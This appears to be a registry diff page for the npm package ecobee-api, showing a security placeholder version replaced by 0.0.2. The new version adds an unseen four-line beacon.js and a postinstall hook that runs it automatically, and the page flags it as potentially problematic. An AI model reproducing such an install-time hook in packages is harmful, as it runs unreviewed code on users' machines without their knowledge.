ecobee-api 0.0.1-security → 0.0.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of ecobee-api might be problematic. Click here for more details.
- package/README.md +2 -4
- package/beacon.js +4 -0
- package/package.json +11 -4
package/README.md
CHANGED
|
@@ -1,5 +1,3 @@
|
|
|
1
|
-
#
|
|
1
|
+
# ecobee-api
|
|
2
2
|
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=ecobee-api for more information.
|
|
3
|
+
Package placeholder.
|
package/beacon.js
ADDED
package/package.json
CHANGED
|
@@ -1,6 +1,13 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "ecobee-api",
|
|
3
|
-
"version": "0.0.
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
6
|
-
|
|
3
|
+
"version": "0.0.2",
|
|
4
|
+
"description": "Utility package",
|
|
5
|
+
"license": "UNLICENSED",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node beacon.js"
|
|
8
|
+
},
|
|
9
|
+
"files": [
|
|
10
|
+
"beacon.js",
|
|
11
|
+
"README.md"
|
|
12
|
+
]
|
|
13
|
+
}
|